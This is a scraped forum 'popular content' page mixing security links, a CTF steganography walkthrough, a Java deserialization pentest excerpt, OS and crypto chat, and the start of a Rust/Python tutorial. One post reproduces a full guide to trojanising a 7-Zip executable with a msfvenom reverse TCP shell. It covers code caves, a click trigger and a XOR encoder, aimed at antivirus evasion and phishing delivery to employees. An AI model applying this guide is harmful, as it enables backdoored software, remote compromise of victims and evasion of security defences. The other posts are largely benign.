
Leaderboard


Popular Content

Showing content with the highest reputation since 11/13/17 in all areas

  1. 18 points
    I made myself a blog too. I won't write very often, just now and then... https://nytrosecurity.com/
  2. 8 points
  3. 8 points
    Try logging in as the user "root" without a password on the latest version of macOS (try two times) https://mobile.twitter.com/lemiorhan/status/935581020774117381 LE: Already in the news https://www.laptopmag.com/articles/root-macos-high-sierra
  5. 6 points
    Walkthrough: @Usr6
    1. Download the image and check that it is intact:
    # curl -s https://rstforums.com/forum/uploads/monthly_2017_11/the_big_fat_panda.jpg.07e36e8e2681213cd21cbe01d72e9baa.jpg --output The_Big_Fat_Panda.jpg && md5sum The_Big_Fat_Panda.jpg
    409302f21ea7dcfe2ed9bbf3c810081c The_Big_Fat_Panda.jpg
    2. Open the image in a hex editor (I used Bless on Ubuntu) and check whether there is anything after the image data. We look for anything that follows the bytes FF D9. In our case we see: PK.. NobodyUnderstandMe.jpg PK - this means we have an archive, a zip.
    3. Extract the archive from the image:
    # unzip The_Big_Fat_Panda.jpg
    We get another image: "NobodyUnderstandMe.jpg". We try to do the same thing as with the first image, but it asks for a password and gives us a puzzle:
    Sometimes DA means DA and NU means NU, sometimes DA means NU and NU means DA, sometimes DA means POATE and POATE means NU, sometimes NU means POATE and POATE... DID YOU UNDERSTAAAND?
    DANUDADANUNUDANUDANUNUDADADADANUDANUNUDADADANUNUDANUNUDADADADANUDANUNUNUDADANUDADANUDADADADADANUDANUNUDANUDADANUDADANUDADANUDANUNUDANUNUNUDADANUNUDADADANUNUDANUNUDADANUDANUDANUNUNUDADANUDADANUNUDADADANUNUDANUNUDADADADANUDANUNUNUDANUDADA
    Initially I stopped here and asked for a hint; I was given this image: https://rstforums.com/forum/applications/core/interface/imageproxy/imageproxy.php?img=https://upload.wikimedia.org/wikipedia/commons/thumb/7/75/Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg/220px-Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg&key=65b8c92411b156ea5a00ea79269010df0e1ad7e390288503459d91a50af16a4d
    # From which we extract the link: https://upload.wikimedia.org/wikipedia/commons/thumb/7/75/Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg/220px-Macbook_Pro_Power_Button_-_Macro_(5477920228).jpg
    4. We search Google by image and land on the wiki page: https://en.wikipedia.org/wiki/Power_symbol
    # We notice the quote: The symbol for the standby button was created by superimposing the symbols "|" and "o"; however, it is commonly misinterpreted as the numerals "0" and "1"
    5. We take the DA and NU string and replace "DA" with 0 and "NU" with 1, obtaining: 010011010110000101100011011000010111001001000001011010010100100101101110011000110110010101110010011000110110000101110100
    # We convert it from binary to ASCII and get: MacarAiIncercat
    6. We see that this is the password ("MacarAiIncercat" can mislead you; at first I thought this was not the way to proceed), after which we get a text file: DA, chiar e ceea ce pare, doar ca standard=dradnats vpGWkp6TipPfkYrfno2a35GaiZCWmt+bmt+Q34+Nmpiei5aNmt+Mj5qclp6Tnt+PmpGLjYrfnt+Zlt+ekZaSnpPT35CSipPflpGMnt+PmpGLjYrfnt+bmomakZbfkJLfno2a35GaiZCWmt+bmt+am4qcnouWmtPfmpuKnJ6Llp7fmZ6cmt+blpmajZqRi57fm5aRi42a35CekpqRlt+Mlt+ekZaSnpOa0d+yno2ciozfq4qTk5aKjN+8lpyajZD=
    7. We notice that it is base64, and we also notice the hint: "standard=dradnats". We search Google for an implementation of the base64 algorithm: https://en.wikibooks.org/wiki/Algorithm_Implementation/Miscellaneous/Base64#Javascript_2 We reverse the base64chars list and run the function on our string: https://jsfiddle.net/9vdbamd9/1/
    base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    # becomes
    base64chars = '/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA'
    Decoded string: Animalul nu are nevoie de o pregatire speciala pentru a fi animal, omul insa pentru a deveni om are nevoie de educatie, educatia face diferenta dintre oameni si animale. Marcus Tullius Cicero
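    As an added example that is not part of the walkthrough above, here is the decoding chain of steps 5-7 in Python: DA/NU tokens to bits, bits to ASCII, and the "standard=dradnats" base64 decoded by translating the reversed alphabet back to the standard one rather than patching a JavaScript implementation. The bit string and the base64 blob are copied from the walkthrough; the short DA/NU sample in the test is constructed, and the function names are my own.

```python
import base64
import re

# Standard base64 alphabet and the "dradnats" alphabet (the same symbols, reversed).
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
REV_ALPHABET = STD_ALPHABET[::-1]

# Both inputs below are copied from the walkthrough (step 5 and step 6).
PAGE_BITS = (
    "01001101011000010110001101100001011100100100000101101001"
    "0100100101101110011000110110010101110010011000110110000101110100"
)
PAGE_B64 = (
    "vpGWkp6TipPfkYrfno2a35GaiZCWmt+bmt+Q34+Nmpiei5aNmt+Mj5qclp6Tnt+PmpGLjYrfnt+Zlt+e"
    "kZaSnpPT35CSipPflpGMnt+PmpGLjYrfnt+bmomakZbfkJLfno2a35GaiZCWmt+bmt+am4qcnouWmtPf"
    "mpuKnJ6Llp7fmZ6cmt+blpmajZqRi57fm5aRi42a35CekpqRlt+Mlt+ekZaSnpOa0d+yno2ciozfq4qT"
    "k5aKjN+8lpyajZD="
)


def danu_to_bits(text: str) -> str:
    """Map every DA token to '0' and every NU token to '1'; anything else is ignored."""
    return "".join("0" if tok == "DA" else "1" for tok in re.findall(r"DA|NU", text))


def bits_to_ascii(bits: str) -> str:
    """Pack a bit string into characters, 8 bits each; a trailing partial byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def decode_reversed_base64(data: str) -> bytes:
    """Decode base64 written with the reversed alphabet.

    Symbol i of the reversed alphabet carries value i, so translating each symbol to
    symbol i of the standard alphabet yields ordinary base64; '=' padding is untouched.
    """
    table = str.maketrans(REV_ALPHABET, STD_ALPHABET)
    return base64.b64decode(data.translate(table))


def solve() -> dict:
    """Run the whole chain on the walkthrough's inputs."""
    password = bits_to_ascii(PAGE_BITS)
    # latin-1 never fails, so an unexpected byte shows up as a character instead of an error
    quote = decode_reversed_base64(PAGE_B64).decode("latin-1")
    return {"password": password, "quote": quote}


if __name__ == "__main__":
    for key, value in solve().items():
        print(f"{key}: {value}")
```

    Running the file prints the zip password and the decoded quote; the same translate-then-decode trick works for any base64 variant that only permutes the alphabet.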
  6. 6 points
    During a black-box penetration test we encountered a Java web application which presented us with a login screen. Even though we managed to bypass the authentication mechanism, there was not much we could do. The attack surface was still pretty small; there were only a few things we could tamper with. 1. Identifying the entry point: In the login page I noticed a hidden POST parameter that was being sent with every login request: <input type="hidden" name="com.ibm.faces.PARAM" value="rO0..." /> The famous Base64 rO0 (ac ed in hex) confirmed to us that we were dealing with a Base64-encoded Java serialized object. The Java object was actually an unencrypted JSF ViewState. Since deserialization vulnerabilities are notorious for their trickiness, I started messing with it. Full article: https://securitycafe.ro/2017/11/03/tricking-java-serialization-for-a-treat/
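    Added example (not from the post or from securitycafe.ro): the indicator described above, the rO0 prefix that encodes the AC ED stream magic, turned into a check a defender can run over submitted form fields to list parameters carrying raw Java serialization streams, the kind of ViewState that should be encrypted or signed. The form, the parameter names other than com.ibm.faces.PARAM and the sample value are constructed; the sample is only a stream header, not a real ViewState.

```python
import base64
import binascii
from typing import Optional
from urllib.parse import unquote

# Every Java serialization stream starts with the magic 0xACED followed by the
# two-byte stream version (0x0005 on every modern JVM). Base64 of 0xAC 0xED 0x00
# always begins with "rO0", which is why that prefix is the quick tell.
JAVA_STREAM_MAGIC = b"\xac\xed"


def decode_param(value: str) -> Optional[bytes]:
    """Undo URL-encoding and base64 the way a form value arrives; None if not base64."""
    raw = unquote(value).strip()
    try:
        return base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_java_serialized(value: str) -> dict:
    """Report whether a single form value is a Java serialization stream."""
    data = decode_param(value)
    if data is None or not data.startswith(JAVA_STREAM_MAGIC):
        return {"serialized": False}
    version = int.from_bytes(data[2:4], "big") if len(data) >= 4 else None
    return {"serialized": True, "stream_version": version, "length": len(data)}


def scan_form(params: dict) -> list:
    """Names of the parameters that carry a Java serialized object."""
    return [name for name, value in params.items()
            if inspect_java_serialized(value)["serialized"]]


# Constructed sample: magic, version 5 and the start of a TC_OBJECT record (0x73 0x72).
SAMPLE_VIEWSTATE = base64.b64encode(JAVA_STREAM_MAGIC + b"\x00\x05\x73\x72").decode()

# Constructed login form; only the hidden JSF parameter carries a serialized object.
CONSTRUCTED_FORM = {
    "username": "alice",
    "password": "hunter2",
    "com.ibm.faces.PARAM": SAMPLE_VIEWSTATE,
    "csrf_token": base64.b64encode(b"hello").decode(),
}

if __name__ == "__main__":
    print("sample value:", SAMPLE_VIEWSTATE)
    print("serialized parameters:", scan_form(CONSTRUCTED_FORM))
```

    A finding from this check means the server accepts a client-controlled object graph; the usual fix is server-side state or an encrypted and authenticated ViewState, plus deserialization filters on the JVM.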
  7. 5 points
    And if the world has no reason to thank you, will you offer some woman from your life to others as alternative satisfaction? Because statements of this kind are either made by someone credible (with a track record of successful crypto investments), insider trading, or accompanied by some logical arguments. Otherwise they are irrelevant, even if wabi has an interesting background and potential.
  9. 5 points
    md5(crack_me.jpg) = C720E708AB375E531BB77DCA9DD08D38
  10. 5 points
    I have used Windows for 6 years, Linux for a year and macOS for 3 years, approximately, because for a while I used them in dual boot for different purposes. I prefer macOS in every respect, except for games. I judge them by how well they look and run on the same system, with the same resources, because there was a period when I tried them all on the same config, and macOS behaved best in the combination of appearance, resources consumed, features and speed. The other two have too many disadvantages for me:
    Linux:
    - Most professional software is missing, and virtualization is a solution, but a pathetic one - this disadvantage is the most important one, you simply can't use the free alternatives it offers;
    - The interface seems about to fall apart at any moment, nothing feels solid on Linux, you run into all kinds of glitches at every step. I have used LXDE, XFCE, KDE, GNOME, Unity. Unity ;
    - When you fix a problem, you almost always use the terminal; it's clear everything is aimed at administrators, I can't even understand how Linux became so popular among home users.
    Windows:
    - Each update is more pathetic than the previous one. That interface is forever a few years behind -- Microsoft is forever terrible at design;
    - Resource consumption is higher than on macOS -- again, on the same config;
    - After decades in production, it still can't protect itself from viruses more effectively; you have to rely on external solutions to protect yourself;
    - It needs a restart for far too many operations. This kills me;
    - The update system is execrable. It interrupts your work to restart itself and takes far too long.
    I don't think he is looking for a conclusion; he also said he expects subjective answers. Maybe he is just interested in our experience with the OSes.
    The difference between distributions is the DE (Desktop Environment) and the package manager (apt in Debian and its derivatives, pacman in Arch, yum in RedHat and its derivatives etc.), or the lack of one; the rest is not noticeable for a home user. To choose one, it matters a lot how much effort you are willing to put into installing it. For example, if you feel like installing the DE yourself, a distribution like Arch seems a good choice to me, because it has a good package manager and doesn't consume many unnecessary resources out of the box. If you don't feel like installing the DE yourself, you can use the distributions derived from Ubuntu: Lubuntu, Xubuntu, Kubuntu, Ubuntu Gnome, but if you don't have many resources available, you will notice a difference in speed.
  11. 5 points
    Table of Contents [hide] 1 Introduction 2 Self Imposed Restrictions 3 Methods used: 4 Criteria for PE file selection for implanting backdoor 4.1 ASLR: 4.2 Static Analysis 5 Backdooring PE file 6 Adding a new Section header method 6.1 Hijack Execution Flow 6.2 Adding Shellcode 6.3 Modifying shellcode 6.4 Spawning shell 6.5 Pros of adding a new section header method 6.6 Cons of adding a new section header method 7 Triggering shellcode upon user interaction + Codecaves 7.1 Code Caves 7.2 Triggering Shellcode Upon user interaction 7.3 Spawning Shell 8 Custom Encoding Shellcode 8.1 Spawning shell 9 Conclusion Introduction During Penetration testing engagement you are required to backdoor a specific executable with your own shellcode without increasing the size of the executable or altering its intended functionality and hopefully making it fully undetectable (FUD) how would you do it?. For example, after recon, you gather information that a lot number of employees use a certain “program/software”. The social engineering way to get in the victim’s network would be a phishing email to employees with a link to download “Updated version of that program”, which actually is the backdoored binary of the updated program. This post will cover how to backdoor a legitimate x86 PE (Portable Executable) file by adding our own reverse TCP shellcode without increasing the size or altering the functionality. Different techniques are also discussed on how to make the backdoor PE fully undetectable (FUD). The focus in each step of the process is to make the backdoored file Fully undetectable. The word “undetectable” here is used in the context of scan time static analysis. Introductory understanding of PE file format, x86 assembly and debugging required. Each section is building upon the previous section and no topic is repeated for the sake of conciseness, one should reference back and forth for clarity. 
Self Imposed Restrictions Our goal is to backdoor a program in a way that it becomes fully undetectable by anti viruses, and the functionality of the backdoored program should remain the same with no interruptions/errors. For anti-virus scanning purposes we will be using NoDistribute.There are a lot of way to make a binary undetectable, using crypters that encode the entire program and include a decoding stub in it to decode at runtime, compressing the program using UPX, using veil-framework or msfvenom encodings. We will not be using any of such tools. The purpose is to keep it simple and elegant! For this reason I have the following self imposed restrictions:- No use to Msfvenom encoding schemes, crypters, veil-framework or any such fancy tools. Size of the file should remain same, which means no extra sections, decoder stubs, or compressing (UPX). Functionality of the backdoored program must remain the same with no error/interruptions. Methods used: Adding a new section header to add shellcode User interaction based shellcode Trigger + codecaves. Dual code caves with custom encoder + triggering shellcode upon user interaction Criteria for PE file selection for implanting backdoor Unless you are forced to use a specific binary to implant a backdoor the following points must be kept in mind. They are not required to be followed but preferred because they will help reducing the AV detection rate and making the end product more feasible. The file size of executable should be small < 10mb, Smaller size file will be easy to transfer to the victim during a penetration testing engagement. You could email them in ZIP or use other social engineering techniques. It will also be convenient to debug in case of issues. Backdoor a well known product, for example Utorrent, network utilities like Putty, sysinternal tools, winRAR , 7zip etc. 
Using a known PE file is not required, but there are more chances of AV to flag an unknown PE backdoor-ed than a known PE backdoor-ed and the victim would be more inclined to execute a known program. PE files that are not protected by security features such as ASLR or DEP. It would be complicated to backdoor those and won’t make a difference in the end product compared to normal PE files. It is preferable to use C/C++ Native binaries. It is preferable to have a PE file that has a legitimate functionality of communicating over the network. This would fool few anti viruses upon execution when backdoor shellcode will make a reverse connection to our desired box. Some anti viruses would not flag and will consider it as the functionality of the program. Chances are network monitoring solutions and people would consider malicious communication as legitimate functionality. The Program we will be backdooring is 7Zip file archiver (GUI version). Firstly lets check if the file has ASLR enabled. ASLR: Randomizes the addresses each time program is loaded in memory, this way attacker cannot used harcoded addresses to exploit flaws/shellcode placement. Powershell script result shows no ASLR or DEP security mechanism As we can see in the above screenshot, not much in terms of binary protection. Lets take a look at some other information about the 7zip binary. Static Analysis Static Analysis of 7zip binary The PE file is 32 bit binary, has a size of about 5mb. It is a programmed in native code (C++). Seems like a good candidate for our backdoor. Lets dig in! Backdooring PE file There are two ways to backdoor Portable executable (PE) files. Before demonstrating both of them separately it is important to have a sense of what do we mean by backdooring a PE file?. 
In simple terms we want a legitimate windows executable file like 7zip achiever (used for demonstration) to have our shellcode in it, so when the 7zip file is executed our shellcode should get executed as well without the user knowing and without the anti viruses detecting any malicious behavior. The program (7zip) should work accurately as well. The shellcode we will be using is a stageless MSFvenom reverse TCP shell. Follow this link to know the difference between staged and stageless payloads Both of the methods described below has the same overall process and goal but different approaches to achieve it. The overall process is as follow:- Find an appropriate place in memory for implanting our shell code, either in codecaves or by creating new section headers, both methods demonstrated below. Copy the opcodes from stack at the beginning of program execution. Replace those instructions with our own opcodes to hijack the execution flow of the application to our desired location in memory. Add the shellcode to that memory location which in this case is stageless TCP reverse shell. Set the registers back to the stack copied in first step to allow normal execution flow. Adding a new Section header method The idea behind this method is to create a new header section in PE file, add our shellcode in newly created section and later point the execution flow it that section. The new section header can be created using a tool such as LordPE. Open Lord PE Go to section header and add the section header (added .hello) at the bottom. Add the Virtual size and Raw size 1000 bytes. Note that 1000 is in hexadecimal (4096 bytes decimal). Make the section header executable as we have to place our Shellcode in this section so it has to be executable, writable and readable. Save the file as original. Adding a new header section Now if we execute the file, it wont work because we have added a new section of 1000h bytes, but that header section is empty. 
Binary not executing because of empty header section To make to file work normally as intended, we have to add 1000h bytes at the end of the file because right now the file contains a header section of 1000 bytes but that section is empty, we have to fill it up by any value, we are filling it up by nulls (00). Use any hex editor to add 1000 hexademical bytes at the end of the file as shown below. Adding 1000h bytes at the end of the file We have added null values at the end of the file and renamed it 7zFMAddedSection.exe. Before proceeding further we have to make sure now our executable 7zFMAddedSection.exe, is working properly and our new section with proper size and permissions is added, we can do that in Ollydbg by going to memory section and double clicking PE headers. PE Headers in Ollydbg Hijack Execution Flow We can see that our new section .hello is added with designated permissions. Next step is to hijack the execution flow of the program to our newly added .hello section. When we execute the program it should point to .hello section of the code where we would place our shellcode. Firstly note down the first 5 opcodes, as will need them later when restoring the execution flow back. We copy the starting address of .hello section 0047E000 open the program in Ollydbg and replace the first opcode at address 004538D8 with JMP to 0047E000. Replacing the starting address with JMP to new section Right click -> Copy to executable -> all modifications -> Save file. We saved the file as 7zFMAddedSectionHijacked.exe (File names getting longer and we are just getting started!) Up-till now we have added a new header section and hijacked the execution flow to it. We open the file 7zFMAddedSectionHijacked.exe in Ollydbg. We are expecting execution flow to redirect to our newly added .hello section which would contain null values (remember we added nulls using hexedit?). Starting of .hello section Sweet! We have a long empty section .hello section. 
Next step is to add our shellcode from the start of this section so it gets triggered when the binary is executed. Adding Shellcode As mentioned earlier we will be using Metasploit’s stagless windows/shell_reverse_tcp shellcode. We are not using any encoding schemes provided by msfvenom, most of them if not all of them are already flagged by anti viruses. To add the shellcode firstly we need push registers on to the stack to save their state using PUSHAD and PUSHFD opcodes. At the end of shellcode we pop back the registers and restore the execution flow by pasting initial (Pre hijacked) program instructions copied earlier and jumping back to make sure the functionality of 7zip is not disturbed. Here is the sequence of instructions PUSHAD PUSHFD Shellcode.... POPAD POPFD Restore Execution Flow... We generate windows stageless reverse shellcode using the following arguments in mfsvenom msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.128 LPORT=8080 -a x86 --platform windows -f hex Copy the shellcode and paste the hex in Ollydbg as right click > binary > binary paste , it will get dissembled to assembly code. Added shellcode at the start of .hello section Modifying shellcode Now that we have our reverse TCP shellcode in .hello section its time to save the changes to file, before that we need to perform some modifications to our shellcode. At the end of the shellcode we see an opcode CALL EBP which terminates the execution of the program after shellcode is executed, and we don’t want the program execution to terminate, infact we want the program to function normally after the shellcode execution, for this reason we have to modify the opcode CALL EBP to NOP (no operation). Another modification that needs to be made is due to the presence of a WaitForSingleObject in our shellcode. WaitForSignleObject function takes an argument in milliseconds and wait till that time before starting other threads. 
If the WaitForSignleObject function argument is -1 this means that it will wait infinite amount of time before starting other threads. Which simply means that if we execute the binary it will spawn a reverse shell but normal functionality of 7zip would halt till we close our reverse shell. This post helps in finding and fixing WaitForSignleObject. We simply need to modify opcode DEC INC whose value is -1 (Arugment for WaitForSignleObject) to NOP. Next we need to POP register values off the stack (to restore the stack value pre-shellcode) using POPFD and POPAD at the end of shellcode. After POPFD and POPAD we need to add the 5 hijacked instructions(copied earlier in hijack execution flow) back, to make sure after shellcode execution our 7zip program functions normally. We save the modifications as 7zFMAddedSectionHijackedShelled.exe Spawning shell We setup a listener on Kali Box and execute the binary 7zFMAddedSectionHijackedShelled.exe. We get a shell. 7zip binary works fine as well with no interruption in functionality. We got a shell! How are we doing detection wise? Detection Rate Not so good!. Though it was expected since we added a new writeable, executable section in binary and used a known metasploit shellcode without any encoding. Pros of adding a new section header method You can create large section header. Large space means you don’t need to worry about space for shellcode, even you can encode your shellcode a number of times without having to worry about its size. This could help bypassing Anti viruses. Cons of adding a new section header method Adding a new section header and assigning it execution flag could alert Anti viruses. Not a good approach in terms of AV detection rate. It will also increase the size of original file, again we wouldn’t want to alert the AV or the victim about change of file size. High detection rate. Keeping in mind the cons of new section header method. 
Next we will look at two more methods that would help help us achieve usability and low detection rate of backdoor. Triggering shellcode upon user interaction + Codecaves What we have achieved so far is to create a new header section, place our shellcode in it and hijack the execution flow to our shellcode and then back to normal functionality of the application. In this section we will be chaining together two methods to achieve low detection rate and to mitigate the shortcomings of new adder section method discussed above. Following are the techniques discussed:- How to trigger our shellcode based on user interaction with a specific functionality. How to find and use code caves. Code Caves Code caves are dead/empty blocks in a memory of a program which can be used to inject our own code. Instead of creating a new section, we could use existing code caves to implant our shellcode. We can find code caves of different sizes in almost of any PE. The size of the code cave does matter!. We would want a code cave to be larger than our shellcode so we could inject the shellcode without having to split it in smaller chunks. The first step is to find a code cave, Cave Miner is an optimal python script to find code caves, you need to provide the size of the cave as a parameter and it will show you all the code caves larger than that size. finding code caves for injection We got two code caves larger than 700 bytes, both of them contain enough space for our shellcode. Note down the virtual address for both caves. Virtual address is the starting address of the cave. Later We will hijack the execution flow by jumping to the virtual addresses. We will be using both caves later, for now, we only require one cave to implant in our shellcode. We can see that the code cave is only readable, we have to make it writable and executable for it to execute our shellcode. We do that with LORDPE. 
Making .rsrc writeable and executable Triggering Shellcode Upon user interaction Now that we have a code cave we can jump to, we need to find a way to redirect execution flow to our shellcode upon user interaction. Unlike in the previous method, we don’t want to hijack the execution flow right after the program is run. We want to let the program run normally and execute shellcode upon user interaction with a specific functionality, for example clicking a specific tab. To accomplish this we need to find reference strings in the application. We can then hijack the address of a specific reference string by modifying it to jump to code cave. This means that whenever a specific string is accessed in memory the execution flow will get redirected to our code cave. Sounds good? Let see how do we achieve this. Open the 7zip program in Ollydbg > right click > search for > all reference text strings Found a suitable reference string In reference strings we found an interesting string, a domain (http://www.7-zip.org). The memory address of this domain gets accessed when a user clicks on about > domain. Website button functionality Note that we can have multiple user interaction triggers that can be backdoored in a single program using the referenced strings found. For the sake of an example we are using the domain button on about page which upon click opens the website www.7-zip.org in browser. Our objective is to trigger shellcode whenever a user clicks on the domain button. Now we have to add a breakpoint at the address of domain string so that we can then modify its opcode to jump to our code cave when a user clicks on the website button.We copy the address of domain string 0044A8E5 and add a breakpoint. We then click on the domain button in the 7zip program. 
The execution stops at the breakpoint as seen in the below screenshot:- Execution stops at break point address 0044A8E5 (http;//www.7zip.org/) now we can modify this address to jump to code cave, so when a user clicks on the website button execution flow would jump to our code cave, where in next step we will place our shellcode. Firstly we copy couple of instructions after 0044A8E5 address as they will be used again when we want to point execution flow back to it after shellcode execution to make sure normal functionality of 7zip. inject backdoor into exe After modification to jmp 00477857 we save the executable as 7zFMUhijacked.exe . Note that the address 00477857 is the starting address of codecave 1. We load the 7zFMUhijacked.exe in Ollydbg and let it execute normally, we then click on the website button. We are redirected to an empty code cave. Nice! we have redirected execution flow to code cave upon user interaction. To keep this post concise We will be skipping the next steps of adding and modifying the shellcode as these steps are the same explained above “6.2 Adding shellcode” and “6.3 Modifying shellcode“. Spawning Shell We add the shellcode, modify it, restore the execution flow back to from where we hijacked it 0044A8E5 and save the file as 7zFMUhijackedShelled.exe. The shellcode used is stageless windows reverse TCP. We set a netcat listener, run 7zFMUhijackedShelled.exe , click on the website button. Fully Undetectable backdoor PE Files Everything worked as we expected and we got a shell back! . Lets see how are we doing detection wise? Triggering shellcode upon user interaction + Codecaves detection. Thats good! we are down from 16/36 to 3/38. Thanks to code caves and triggering shellcode upon user interaction with a specific functionality. 
This shows a weakness in detection mechanism of most anti viruses as they are not able to detect a known msfvenom shellcode without any encoding just because it is in a code cave and triggered upon user interaction with specific functionality. The detection rate 3/38 is good but not good enough (Fully undetectable). Considering the self imposed restrictions, the only viable route from here seem to do custom encoding of shellcode and decode it in memory upon execution. Custom Encoding Shellcode Building upon what we previously achieved, executing shellcode from code cave upon user interaction with a specific program functionality, we now want to encode the shellcode using XOR encoder. Why do we want to use XOR, a couple of reasons, firstly it is fairly easy to implement, secondly we don’t have to write a decoder for it because if you XOR a value 2 times, it gives you the original value. We will encode the shellcode with XOR once and save it on disk. Then we will XOR the encoded value again in memory at runtime to get back the original shellcode. Antiviruses wouldn’t be able to catch it because it is being done in memory! We require 2 code caves for this purpose. One for shellcode and one for encoder/decoder. In finding code caves section above we found 2 code caves larger than 700 bytes both of them have fair enough space for shellcode and encoder/decoder. Below is the flow chart diagram of execution flow. 
Custom encoding shellcode in code caves + Triggering shellode upon user interaction So we want to hijack the program execution upon user interaction of clicking on the domain button to CC2 starting address 0047972e which would contain the encoder/decoder XOR stub opcodes, it will encode/decode the shellcode that resides in CC1 starting address 00477857, after CC2 execution is complete we will jump to CC1 to start execution which would spawn back a shell, after CC2 execution we will jump back from CC2 to where we initially hijacked the execution flow with clicking the domain button to make sure the functionality of the 7zip program remains the same and the victim shouldn’t notice any interruptions. Sounds like a long ride, Lets GO! Note that the steps performed in the last section wouldn’t be repeated so reference back to hijacking execution upon user interaction, adding shellcode in codecaves, modifying shellcode and restoring the execution flow back to where we hijacked it. Firstly we Hijack the execution flow from address 0044A8E5 (clicking domain button) to CC2 starting address 0047972e and save the modifications as file on disk. We run the modified 7zip file in Ollydbg and trigger the hijacking process by clicking on the domain button. Hijacking execution flow to CC2 Now that we are in CC2, before writing our XOR encoder here, we will firstly jump to starting address of CC1 and implant our shellcode so that we get the accurate addresses that we have to use in XOR encoder. Note that the first step of hijacking to CC2 can also be performed at the end as well, as it won’t impact the overall execution flow illustrated in flowchart above. We jump to CC1 , implant, modify shellcode and restore the execution flow to 0044A8E5 from where we hijacked to CC2 to make sure smooth execution of 7zip program functionality after shellcode. Note that implanting, modifying shellcode and restoring execution flow is already explained in previous sections. 
Bottom of shellocode at CC1 Above screenshot shows the bottom of shellocode at CC1, note down the address 0047799B, this is where the shellcode ends, next instructions are for restoring the execution flow back. So we have to encode from starting of the shellcode at address 00477859 till 0047799B. We move to 00477857 the starting address of CC2, we write XOR encoder, following are the opcodes for XOR encoder implementation. PUSH ECX, 00477857 // Push the starting address of shellcode to ECX. XOR BYTE PTR DS:[EAX],0B // Exclusive OR the contents of ECX with key 0B INC ECX // Increase ECX to move to next addresses CMP ECX,0047799B // Compare ECX with the ending address of shellcode JLE SHORT 00479733 // If they are not equal, take a short jump back to address of XOR operation JMP 7zFM2.00477857 // if they are equal jump to the start of shellcode As we are encoding the opcodes in CC1, we have to make sure the header section in which the CC1 resides is writeable otherwise Ollydbg will show access violation error. Refer back to codecaves section to know how to make it writable and executable. We add a breakpoint at JMP 7zFM2.00477857 after the encoding is performed and we are about to jump back to encoded shellcode. If we go back to CC1 we will see that out shellcode is encoded now. Custom encode shellcode in memory All is left to save the modifications of both the shellcode at CC1 and the encoder at CC2 to a file we named it as 7zFMowned.exe. Lets see if its working as intended. Spawning shell We setup a listener on port 8080 on our Kali box, run 7zFMbackdoored.exe in windows and click on domain button . 7zip website pops up in the browser and if we go back to our kali box. We got a shell How are we doing detection wise? Fully undetectable PE file using Dual code caves, custom encoder and trigger upon user interaction Conclusion Great! we have achieved fully undetectable backdoor PE file that remains functional with the same size. 
Source: https://haiderm.com/fully-undetectable-backdooring-pe-files/
  12. 5 points
    We discussed this at university (I'm in the field) and many complications can arise. The surgeon I spoke to said it is possible, but the success rate is low. Every person has certain "mutations", so to speak, at the DNA level. Supposedly, by administering immunosuppressants so the transplant isn't rejected, it's possible to live 10-15 years, but that applies to liver, heart transplants etc. Here we're talking about nerves, neurons, glial cells, which have a much more fragile structure than the ones above. Structural diseases of the nervous system can appear very easily. It's possible, but unlikely to be a success, especially long-term.
  13. 4 points
    What is InfoCon? InfoCon is a community supported, non-commercial archive of all the past hacking related convention material that can be found. https://infocon.org/
  14. 4 points
    Revised joke: A boy asked his bitcoin-investing dad for $20. Dad: $15.56? What do you need $24.21 for?
  15. 4 points
    Invest in eggs. Thank me later.
  16. 4 points
    oho... there's nothing I can script or program, I tried... there's no pattern... I simply search online for which ICOs are coming up, what software they're building, or what ideas they have... I invest in them and wait. And with ICOs, it's not that simple.. you have to look for a lot of things that I can't say here. But the idea is that it works, you lose, you win.... you win more at the end of the day/week/month. You just have to not panic and HODL that coin until it reaches a certain threshold... Here: https://we.tl/s-idH2dUOpfV look at these to get an idea of the trend...
  17. 4 points
    Windows, ofc. I have no money for a Mac because I'm poor, and I'm not a masochist to run Linux.
  18. 4 points
    What is Rust?

Rust is a systems programming language that runs blazingly fast, prevents segfaults, and guarantees thread safety. Featuring:

- zero-cost abstractions
- move semantics
- guaranteed memory safety
- threads without data races
- trait-based generics
- pattern matching
- type inference
- minimal runtime
- efficient C bindings

Description is taken from rust-lang.org.

Why does it matter for a Python developer?

The better description of Rust I heard from Elias (a member of the Rust Brazil Telegram Group). There are a bunch of Rust packages out there to help you extend Python with Rust. I can mention Milksnake created by Armin Ronacher (the creator of Flask) and also PyO3, the Rust bindings for the Python interpreter. See a complete reference list at the bottom of this article.

Let's see it in action

For this post, I am going to use Rust Cpython; it's the only one I have tested, it is compatible with the stable version of Rust and I found it straightforward to use.

Pros: It is easy to write Rust functions and import them from Python, and as you will see by the benchmarks it's worth it in terms of performance.

Cons: The distribution of your project/lib/framework will demand the Rust module to be compiled on the target system because of variation of environment and architecture; there will be a compiling stage which you don't have when installing pure Python libraries. You can make it easier using rust-setuptools or using MilkSnake to embed binary data in Python wheels.

Python is sometimes slow

Yes, Python is known for being "slow" in some cases, and the good news is that this doesn't really matter depending on your project goals and priorities. For most projects, this detail will not be very important. However, you may face the rare case where a single function or module is taking too much time and is detected as the bottleneck of your project performance; this often happens with string parsing and image processing.
Example

Let's say you have a Python function which does some string processing. Take the following easy example of counting pairs of repeated chars, but have in mind that this example can be reproduced with other string processing functions or any other generally slow process in Python.

    # How many subsequent-repeated group of chars are in the given string?
    abCCdeFFghiJJklmnopqRRstuVVxyZZ... {millions of chars here}
      1    2    3         4    5   6

Python is slow for doing large string processing, so you can use pytest-benchmark to compare a pure Python (with iterator zipping) function versus a regexp implementation.

    # Using a Python3.6 environment
    $ pip3 install pytest pytest-benchmark

Then write a new Python program called doubles.py

    import re
    import string
    import random


    # Python ZIP version
    def count_doubles(val):
        total = 0
        # there is an improved version later on this post
        for c1, c2 in zip(val, val[1:]):
            if c1 == c2:
                total += 1
        return total


    # Python REGEXP version
    double_re = re.compile(r'(?=(.)\1)')


